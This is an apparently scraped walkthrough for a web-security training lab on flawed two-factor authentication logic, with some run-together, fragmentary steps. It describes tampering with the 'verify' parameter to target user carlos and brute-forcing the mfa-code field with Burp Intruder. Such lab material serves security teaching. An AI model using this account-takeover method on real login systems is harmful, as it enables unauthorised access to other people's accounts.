This lab's two-factor authentication is vulnerable due to its flawed logic. To solve the lab, access Carlos's "My account" page.
You also have access to the email server to receive your 2FA verification code.
POST /login2request, the
verifyparameter is used to determine which user's account is being accessed.
GET /login2request to Burp Repeater. Change the value of the
carlosand send the request. This ensures that a temporary 2FA code is generated for Carlos.
POST /login2request to Burp Intruder.
carlosand add a payload position to the
mfa-codeparameter. Brute-force the verification code.